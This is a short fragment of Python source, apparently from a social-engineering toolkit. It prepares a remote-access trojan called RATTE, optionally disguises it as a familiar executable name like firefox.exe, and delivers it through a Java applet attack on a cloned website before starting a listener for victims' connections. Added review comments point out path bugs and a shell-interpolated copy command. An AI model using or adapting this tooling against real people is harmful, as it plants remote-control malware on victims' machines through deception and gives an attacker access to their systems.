    #         core.print_warning(text.YES_NO_RESPONSES)

    customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))

    #######################################
    # prepare RATTE
    #######################################
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################
    core.print_info("Запуск атаки Java-апплета..")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)
    # NOTE(review): a component that begins with "/" makes os.path.join
    # discard everything before it, so this path resolves to "/rand_gen"
    # regardless of userconfigpath/definepath -- likely not the intended
    # location. ratte_random also stays unbound (NameError below) if the
    # file is empty.
    with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
        for line in fileopen:
            ratte_random = line.rstrip()
    # NOTE(review): shell=True with interpolated paths; a list argv without a
    # shell (or shutil.copy) would avoid word-splitting and metacharacter
    # handling of the file names. If definepath is absolute,
    # os.path.join(userconfigpath, definepath) drops userconfigpath.
    subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()

    #######################
    # start ratteserver
    #######################
    core.print_info("Стартовый ратсервер...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return